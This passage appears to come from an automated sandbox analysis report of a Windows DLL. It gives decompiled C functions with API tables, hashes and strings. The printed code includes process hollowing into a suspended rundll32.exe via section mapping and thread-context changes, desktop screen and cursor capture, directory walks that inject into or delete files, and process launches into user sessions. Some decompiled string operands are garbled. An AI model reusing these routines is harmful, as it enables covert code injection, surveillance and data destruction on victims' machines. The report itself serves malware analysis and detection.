															_t139 = _v304;
															goto L24;
														} else {
															while(1) {
																_push( &_v308);
																_push(_t101 - _t140);
																_push(_t140 + _t144);
																_push(_t138);
																_v308 = 0;
																if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() < 0) {
																	break;
																}
																_t91 = _v324;
																if(_t91 != 0) {
																	_t140 = _t140 + _t91;
																	if(_t140 < _t101) {
																		continue;
																	}
																}
																break;
															}
															if(_t140 == 0) {
																goto L23;
															} else {
																 *_v140 = _t140;
																_t139 = _v320;
																 *_v144 = _t144;
																_v316 = 1;
															}
														}
													}
												}
											}
										}
									}
									 *((intOrPtr*)( *((intOrPtr*)( *_t138 + 8))))(_t138);
								}
								_t137 = _v264;
							}
							DeleteObject(_t137);
						}
						DeleteDC(_v212.flags);
						_t136 = _v192;
					}
					ReleaseDC(_t136, _t139);
					return _v172;
				} else {
					return _t61;
				}
			}

0x6eca66e8
0x6eca66f6
0x6eca66f9
0x6eca66fd
0x6eca6703
0x6eca6705
0x6eca670b
0x6eca6717
0x6eca671d
0x6eca6723
0x6eca672b
0x6eca6731
0x6eca6732
0x6eca673d
0x6eca6743
0x6eca6747
0x6eca674e
0x6eca6750
0x6eca6758
0x6eca675a
0x6eca6760
0x6eca676c
0x6eca6774
0x6eca67ac
0x6eca67b2
0x6eca67b3
0x6eca67bd
0x6eca67c5
0x6eca67cd
0x6eca67de
0x6eca67e4
0x6eca67e5
0x6eca67f4
0x6eca67fc
0x6eca67fe
0x6eca6804
0x6eca6805
0x6eca6816
0x6eca685a
0x6eca685a
0x6eca67fc
0x6eca6864
0x6eca686a
0x6eca686e
0x6eca6874
0x6eca6875
0x6eca687a
0x6eca687b
0x6eca6886
0x6eca688c
0x6eca6895
0x6eca6896
0x6eca68a0
0x6eca68a9
0x6eca68aa
0x6eca68af
0x6eca68b5
0x6eca68be
0x6eca68d4
0x6eca68d8
0x6eca68de
0x6eca68e4
0x6eca68e5
0x6eca68ef
0x6eca68f1
0x6eca68f5
0x6eca6903
0x6eca6905
0x6eca6906
0x6eca6907
0x6eca690c
0x6eca696c
0x6eca6974
0x6eca690e
0x6eca690e
0x6eca6912
0x6eca6968
0x6eca6968
0x00000000
0x6eca6914
0x6eca6914
0x6eca691a
0x6eca691f
0x6eca6926
0x6eca6927
0x6eca6928
0x6eca6934
0x00000000
0x00000000
0x6eca6936
0x6eca693c
0x6eca693e
0x6eca6942
0x00000000
0x00000000
0x6eca6942
0x00000000
0x6eca693c
0x6eca6946
0x00000000
0x6eca6948
0x6eca6956
0x6eca6958
0x6eca695c
0x6eca695e
0x6eca695e
0x6eca6946
0x6eca6912
0x6eca690c
0x6eca68d8
0x6eca68be
0x6eca68af
0x6eca6980
0x6eca6980
0x6eca6982
0x6eca6982
0x6eca6987
0x6eca6987
0x6eca6992
0x6eca6998
0x6eca699d
0x6eca69a0
0x6eca69b2
0x6eca6715
0x6eca6715
0x6eca6715

APIs

GetDesktopWindow.USER32 ref: 6ECA66F0
GetDC.USER32 ref: 6ECA66FD
CreateCompatibleDC.GDI32(00000000), ref: 6ECA6717
RtlZeroMemory.NTDLL(?,00000010), ref: 6ECA6732
GetWindowRect.USER32 ref: 6ECA673D
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 6ECA6752
SelectObject.GDI32(?,00000000), ref: 6ECA676C
BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,40CC0020), ref: 6ECA679E
RtlZeroMemory.NTDLL(?,00000014), ref: 6ECA67B3
GetCursorInfo.USER32(?,?,?,?,?,?,?,?,?,?,00000014), ref: 6ECA67C5
RtlZeroMemory.NTDLL(?,00000014), ref: 6ECA67E5
GetIconInfo.USER32(?,?), ref: 6ECA67F4
RtlZeroMemory.NTDLL(?,00000018), ref: 6ECA6805
GetObjectA.GDI32(?,00000018,?), ref: 6ECA6816

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryZero$CompatibleCreateInfoObjectWindow$BitmapCursorDesktopIconRectSelect
String ID:
API String ID: 3821519111-0
Opcode ID: 24d400444b096101783b36c15f8e6af4b0703542bb136e33e6b5f6babc01f6eb
Instruction ID: ad6c4b17c8aaf5a314158a68f20e2d7761686fd76b0e4b60e8a264edbca0e523
Opcode Fuzzy Hash: 24d400444b096101783b36c15f8e6af4b0703542bb136e33e6b5f6babc01f6eb
Instruction Fuzzy Hash: 08814275214702AFD760DFA8C984F6BBBF8ABC9B44F10491CFA5597284E770D805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA2750, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 115
memorynativethreadCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6ECA2750(CHAR* _a4) {
				intOrPtr _v552;
				struct _CONTEXT _v724;
				struct _STARTUPINFOA _v792;
				struct _PROCESS_INFORMATION _v808;
				void* _v812;
				void* _v816;
				char _t23;
				long* _t38;
				CHAR* _t51;
				void* _t52;
				void* _t55;

				_t51 = _a4;
				_t38 = 0;
				if(GetFileAttributesA(_t51) == 0xffffffff) {
					return 0;
				} else {
					_t55 = HeapAlloc(GetProcessHeap(), 8, 0x30c);
					if(_t55 != 0) {
						_t23 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
						wsprintfA(_t55, "\"%s%s\" %s \"%s\"", _t23, "rundll32.exe", "-svcr", _t51);
						_push(0x44);
						_push( &(_v792.dwX));
						L6ECAC2EE();
						_push(0x10);
						_push( &(_v808.dwProcessId));
						_v792.lpDesktop = 0x44;
						L6ECAC2EE();
						if(CreateProcessA(0, _t55, 0, 0, 0, 4, 0, 0,  &_v792,  &_v808) != 0) {
							_push(_v808.hProcess);
							_t52 = E6ECA2640();
							if(_t52 == 0) {
								L8:
								_push(0);
								_push(_v808.hProcess);
								L6ECAC30C();
							} else {
								_v724 = 0x10002;
								if(NtGetContextThread(_v808.hThread,  &_v724) < 0) {
									goto L8;
								} else {
									_v552 = E6ECA23B0 - "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + _t52;
									if(NtSetContextThread(_v808,  &(_v792.hStdError)) < 0 || NtResumeThread(_v812, 0) < 0) {
										goto L8;
									} else {
										_t38 = 1;
									}
								}
							}
							CloseHandle(_v812);
							CloseHandle(_v816);
						}
						HeapFree(GetProcessHeap(), 0, _t55);
					}
					return _t38;
				}
			}

0x6eca2758
0x6eca2760
0x6eca276b
0x6eca28a2
0x6eca2771
0x6eca2789
0x6eca278d
0x6eca2793
0x6eca27aa
0x6eca27b3
0x6eca27b9
0x6eca27ba
0x6eca27bf
0x6eca27c5
0x6eca27c6
0x6eca27ce
0x6eca27ee
0x6eca27f8
0x6eca27fe
0x6eca2805
0x6eca285f
0x6eca2863
0x6eca2865
0x6eca2866
0x6eca2807
0x6eca2811
0x6eca2820
0x00000000
0x6eca2822
0x6eca2839
0x6eca2847
0x00000000
0x6eca2858
0x6eca2858
0x6eca2858
0x6eca2847
0x6eca2820
0x6eca2876
0x6eca287d
0x6eca287d
0x6eca2885
0x6eca2885
0x6eca2897
0x6eca2897

APIs

GetFileAttributesA.KERNEL32(?), ref: 6ECA2762
GetProcessHeap.KERNEL32(00000008,0000030C), ref: 6ECA2780
HeapAlloc.KERNEL32(00000000), ref: 6ECA2783
wsprintfA.USER32 ref: 6ECA27AA
RtlZeroMemory.NTDLL(?,00000044), ref: 6ECA27BA
RtlZeroMemory.NTDLL ref: 6ECA27CE
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 6ECA27E6
NtGetContextThread.NTDLL ref: 6ECA2819
NtSetContextThread.NTDLL ref: 6ECA2840
NtResumeThread.NTDLL ref: 6ECA284F
NtTerminateProcess.NTDLL(?,00000000), ref: 6ECA2866
CloseHandle.KERNEL32(?,00000044), ref: 6ECA2876
CloseHandle.KERNEL32(?), ref: 6ECA287D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA2882
HeapFree.KERNEL32(00000000), ref: 6ECA2885

Part of subcall function 6ECA2640: RtlZeroMemory.NTDLL(?,00000008), ref: 6ECA2669
Part of subcall function 6ECA2640: NtCreateSection.NTDLL ref: 6ECA268B
Part of subcall function 6ECA2640: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6ECA26B9
Part of subcall function 6ECA2640: NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6ECA26E2
Part of subcall function 6ECA2640: RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 6ECA26F6
Part of subcall function 6ECA2640: NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6ECA272D
Part of subcall function 6ECA2640: NtClose.NTDLL(?), ref: 6ECA2737

Strings

"%s%s" %s "%s", xrefs: 6ECA27A4
-svcr, xrefs: 6ECA2799
rundll32.exe, xrefs: 6ECA279E
D, xrefs: 6ECA27C6

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapMemoryProcessSection$CloseThreadViewZero$ContextCreateHandle$AllocAttributesFileFreeMoveResumeTerminateUnmapwsprintf
String ID: "%s%s" %s "%s"$-svcr$D$rundll32.exe
API String ID: 4033018722-303510360
Opcode ID: d1305998a3c7e22837385199b95691ba598bdc936232b094a846228364bf56a4
Instruction ID: 14b5cc63c8ab6677716ac3a68f037799e69588fc8be30a74379df0341b07fd0c
Opcode Fuzzy Hash: d1305998a3c7e22837385199b95691ba598bdc936232b094a846228364bf56a4
Instruction Fuzzy Hash: 093180B22043066BD304DBEACD84EABBBADEBC5758F00491CBB1597240E674DD098B72

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA28B0, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84
filestringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6ECA28B0(intOrPtr _a8) {
				intOrPtr _v4;
				char _v520;
				char _v528;
				struct _WIN32_FIND_DATAA _v840;
				void* _t25;
				intOrPtr _t36;
				void* _t48;
				CHAR* _t49;
				struct _WIN32_FIND_DATAA* _t53;
				DWORD* _t54;

				_t53 =  &_v840;
				_push(0x140);
				_push( &_v840);
				L6ECAC2EE();
				_push(0x208);
				_push( &_v528);
				L6ECAC2EE();
				_t49 = _t53 + wsprintfA( &(_v840.cAlternateFileName), "%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD") + 0x160;
				wsprintfA(_t49, "%s%c%s", 0x6ecad543, 0x2a, _v4);
				_t54 =  &(_t53->nFileSizeLow);
				_t25 = FindFirstFileA( &_v520,  &_v840);
				_t48 = _t25;
				 *_t49 = 0;
				if(_t48 == 0xffffffff) {
					return _t25;
				} else {
					_t36 = _a8;
					do {
						if(lstrcmpA( &(_v840.cFileName), ".") != 0 && lstrcmpA( &(_v840.cFileName), "..") != 0) {
							lstrcatA( &_v520,  &(_v840.cFileName));
							if((_v840.dwFileAttributes & 0x00000010) == 0) {
								if(_t36 == 0) {
									E6ECA2750( &_v520);
									_t54 =  &(_t54[1]);
								} else {
									DeleteFileA( &_v520);
								}
							}
						}
						 *_t49 = 0;
					} while (FindNextFileA(_t48,  &_v840) != 0);
					return FindClose(_t48);
				}
			}

0x6eca28b0
0x6eca28b8
0x6eca28c1
0x6eca28c2
0x6eca28c7
0x6eca28d3
0x6eca28d4
0x6eca2904
0x6eca2911
0x6eca2913
0x6eca2923
0x6eca2929
0x6eca292b
0x6eca2931
0x6eca29c8
0x6eca2937
0x6eca2938
0x6eca2946
0x6eca2954
0x6eca2973
0x6eca297e
0x6eca2982
0x6eca299c
0x6eca29a1
0x6eca2984
0x6eca298c
0x6eca298c
0x6eca2982
0x6eca297e
0x6eca29aa
0x6eca29b3
0x00000000
0x6eca29bf

APIs

RtlZeroMemory.NTDLL(00000140,00000140), ref: 6ECA28C2
RtlZeroMemory.NTDLL(?,00000208), ref: 6ECA28D4
wsprintfA.USER32 ref: 6ECA28F3
wsprintfA.USER32 ref: 6ECA2911
FindFirstFileA.KERNEL32(?,?), ref: 6ECA2923
lstrcmpA.KERNEL32(?,6ECAD538), ref: 6ECA2950
lstrcmpA.KERNEL32(?,6ECAD534), ref: 6ECA2960
lstrcatA.KERNEL32(?,?), ref: 6ECA2973
DeleteFileA.KERNEL32(?), ref: 6ECA298C
FindNextFileA.KERNEL32(00000000,?), ref: 6ECA29AD
FindClose.KERNEL32(00000000), ref: 6ECA29B8

Strings

%s%c%s, xrefs: 6ECA290B

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$MemoryZerolstrcmpwsprintf$CloseDeleteFirstNextlstrcat
String ID: %s%c%s
API String ID: 1322953341-2756932909
Opcode ID: fd6c056e8b8b5714e2d55e3ab04820b8408e5750a9c58a33726182c93f7ef66e
Instruction ID: a650d012f7e5fd19e59010cbddf2a6427280cdbe57149c37b496ac4c58c10eaf
Opcode Fuzzy Hash: fd6c056e8b8b5714e2d55e3ab04820b8408e5750a9c58a33726182c93f7ef66e
Instruction Fuzzy Hash: 3C217F72104346ABD724EAE9CC54EEFBBBCAB89718F04491CFB9587140F77091098B62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA3610, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80
sleepprocessCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6ECA3610(intOrPtr _a8) {
				WCHAR* _v24;
				struct _STARTUPINFOW _v96;
				struct _PROCESS_INFORMATION _v112;
				long _v116;
				void* _v120;
				void* _t19;
				void* _t26;
				WCHAR* _t29;
				void* _t37;
				intOrPtr _t38;

				_push(_a8);
				_t19 = E6ECA34B0();
				_t37 = _t19;
				_t38 = 0;
				if(_t37 != 0) {
					_push(0);
					_push(_t37);
					_push( &(_v96.lpReserved));
					_v96.lpDesktop = 0x20;
					_v96.lpReserved = 0;
					L6ECAC37E();
					if(_t19 != 0) {
						_v112.dwThreadId = 0x420;
					}
					_push(0x44);
					_push( &(_v96.dwX));
					L6ECAC2EE();
					_push(0x10);
					_push( &(_v112.dwProcessId));
					_v96.lpDesktop = 0x44;
					_v96.dwX = L"Winsta0\\Default";
					L6ECAC2EE();
					_t29 = _v24;
					while(CreateProcessAsUserW(_t37, 0, _t29, 0, 0, 0, _v116, _v120, 0,  &_v96,  &_v112) == 0) {
						Sleep(0x1f4);
						_t38 = _t38 + 1;
						if(_t38 < 0x78) {
							continue;
						}
						L8:
						_t26 = _v120;
						if(_t26 != 0) {
							_push(_t26);
							L6ECAC378();
						}
						return CloseHandle(_t37);
					}
					CloseHandle(_v112.hThread);
					CloseHandle(_v112);
					goto L8;
				}
				return _t19;
			}

0x6eca3619
0x6eca361a
0x6eca361f
0x6eca3621
0x6eca3628
0x6eca362e
0x6eca362f
0x6eca3634
0x6eca3635
0x6eca363d
0x6eca3641
0x6eca3648
0x6eca364a
0x6eca364a
0x6eca3654
0x6eca365a
0x6eca365b
0x6eca3660
0x6eca3666
0x6eca3667
0x6eca366f
0x6eca3677
0x6eca367c
0x6eca3686
0x6eca36b1
0x6eca36b7
0x6eca36bb
0x00000000
0x00000000
0x6eca36d9
0x6eca36d9
0x6eca36e1
0x6eca36e3
0x6eca36e4
0x6eca36e4
0x00000000
0x6eca36ea
0x6eca36d0
0x6eca36d7
0x00000000
0x6eca36d7
0x6eca36f1

APIs

Part of subcall function 6ECA34B0: WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA34DE
Part of subcall function 6ECA34B0: WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA353C
Part of subcall function 6ECA34B0: Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA354C

CreateEnvironmentBlock.USERENV ref: 6ECA3641
RtlZeroMemory.NTDLL(?,00000044), ref: 6ECA365B
RtlZeroMemory.NTDLL ref: 6ECA3677
CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6ECA36A6
Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6ECA36B1
CloseHandle.KERNEL32(?,?,?,?,00000010,?,00000044,00000000), ref: 6ECA36D0
CloseHandle.KERNEL32(00000020,?,?,?,00000010,?,00000044,00000000), ref: 6ECA36D7
DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6ECA36E4
CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6ECA36EA

Strings

, xrefs: 6ECA3635
D, xrefs: 6ECA3667

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleMemory$BlockCreateEnvironmentSleepZero$DestroyEnumerateFreeProcessSessionsUser
String ID: $D
API String ID: 826248435-1196817373
Opcode ID: 823ad4e4e70b7273b33c2a3bf4d8a01c1b41c028d8f53d6a72b5a79040e9f263
Instruction ID: c4d61e96fab125f0b4d94506ca1966effaea963acf8373aef4459eb806803b7a
Opcode Fuzzy Hash: 823ad4e4e70b7273b33c2a3bf4d8a01c1b41c028d8f53d6a72b5a79040e9f263
Instruction Fuzzy Hash: 62215171244302ABD600DBACCC94F9F7BFCAB85748F00490CFB5097280E774E8098BA6

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA2DF0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E6ECA2DF0(intOrPtr _a4, intOrPtr _a8) {
				char _v512;
				char _v520;
				char _v832;
				struct _WIN32_FIND_DATAA _v840;
				signed char _t19;
				CHAR* _t26;
				intOrPtr _t29;
				void* _t36;
				void* _t37;
				FILETIME* _t40;

				_t29 = _a4;
				_t37 = 0;
				wsprintfA( &_v520, "%s%c%s", _t29, 0x2a, _a8);
				_t40 =  &( &_v840->ftLastWriteTime);
				_push(0x140);
				_push( &_v832);
				L6ECAC2EE();
				_t36 = FindFirstFileA( &_v520,  &_v840);
				if(_t36 != 0xffffffff) {
					do {
						_t19 = _v840.dwFileAttributes;
						if((_t19 & 0x00000010) == 0 && _t19 != 0) {
							wsprintfA( &_v520, "%s%s", _t29,  &(_v840.cFileName));
							_t40 = _t40 + 0x10;
							_t26 = DeleteFileA( &_v512);
							if(_t26 == 0) {
								MoveFileExA( &_v512, _t26, 4);
							}
							_t37 = 1;
						}
					} while (FindNextFileA(_t36,  &_v840) != 0);
					FindClose(_t36);
					return _t37;
				} else {
					return 0;
				}
			}

0x6eca2dfb
0x6eca2e1c
0x6eca2e1e
0x6eca2e20
0x6eca2e23
0x6eca2e2c
0x6eca2e2d
0x6eca2e45
0x6eca2e4a
0x6eca2e60
0x6eca2e60
0x6eca2e66
0x6eca2e7f
0x6eca2e81
0x6eca2e8c
0x6eca2e94
0x6eca2ea1
0x6eca2ea1
0x6eca2ea7
0x6eca2ea7
0x6eca2eb8
0x6eca2ebd
0x6eca2ecf
0x6eca2e4f
0x6eca2e58
0x6eca2e58

APIs

wsprintfA.USER32 ref: 6ECA2E1E
RtlZeroMemory.NTDLL(?,00000140), ref: 6ECA2E2D
FindFirstFileA.KERNEL32(?,?,?,00000140), ref: 6ECA2E3F
wsprintfA.USER32 ref: 6ECA2E7F
DeleteFileA.KERNEL32(?), ref: 6ECA2E8C
MoveFileExA.KERNEL32 ref: 6ECA2EA1
FindNextFileA.KERNEL32(00000000,?), ref: 6ECA2EB2
FindClose.KERNEL32(00000000), ref: 6ECA2EBD

Strings

%s%s, xrefs: 6ECA2E79
%s%c%s, xrefs: 6ECA2E16

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$wsprintf$CloseDeleteFirstMemoryMoveNextZero
String ID: %s%c%s$%s%s
API String ID: 3499340181-3555087778
Opcode ID: fedaf7ded02c7ad8501688494ca49575a939cc5ebd3f25c825afa46db37ccb03
Instruction ID: 38a7c299aa2f92d94a49db1898126116de90968455e650c01b8f0474165a9baa
Opcode Fuzzy Hash: fedaf7ded02c7ad8501688494ca49575a939cc5ebd3f25c825afa46db37ccb03
Instruction Fuzzy Hash: F421C372204305ABD360DAE8DC84EEF77BCEBC9726F400929FF5597140EB35A1048A62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAB0A0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106
memorynativethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECAB0A0(long* __esi) {
				long _t27;
				int _t28;
				void _t31;
				long _t34;
				void* _t36;
				void* _t37;
				void* _t40;
				long _t44;
				void* _t52;
				void* _t53;
				void* _t55;
				intOrPtr _t57;
				long* _t58;
				void* _t60;
				long* _t62;

				_t58 = __esi;
				_t62[4] = 0;
				_t27 = NtQuerySystemInformation(5, 0, 0, _t62);
				if(_t27 == 0xc0000004) {
					_t27 =  *_t62;
					if(_t27 != 0) {
						_t28 = VirtualAlloc(0, _t27, 0x1000, 4);
						_t55 = _t28;
						_t62[3] = _t55;
						if(_t55 == 0) {
							L23:
							return _t28;
						}
						if(NtQuerySystemInformation(5, _t55, _t62[1],  &(_t62[1])) < 0 || _t62[1] <= 0) {
							L22:
							_t28 = VirtualFree(_t55, _t62[1], 0x8000);
							goto L23;
						} else {
							_t60 = _t55;
							do {
								if( *((intOrPtr*)(_t60 + 0x44)) != GetCurrentProcessId()) {
									L19:
									_t31 =  *_t60;
									if(_t31 == 0) {
										break;
									}
									goto L20;
								}
								_t40 = 0;
								if( *((intOrPtr*)(_t60 + 4)) <= 0) {
									goto L19;
								}
								_t8 = _t60 + 0xdc; // 0xdc
								_t62[4] = _t8;
								do {
									_t57 =  *(_t62[4]);
									if(_t57 == GetCurrentThreadId()) {
										goto L17;
									}
									_t34 =  *_t58;
									if(_t34 != 0) {
										_t44 = _t58[1];
										if(_t58[2] < _t44) {
											L16:
											 *((intOrPtr*)( *_t58 + _t58[2] * 4)) = _t57;
											_t58[2] = _t58[2] + 1;
											goto L17;
										}
										_t52 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
										_t36 = HeapReAlloc(_t52, 0, _t34, _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44);
										if(_t36 == 0) {
											break;
										}
										_t58[1] = _t58[1] + _t58[1];
										 *_t58 = _t36;
										goto L16;
									}
									_t58[1] = 0x80;
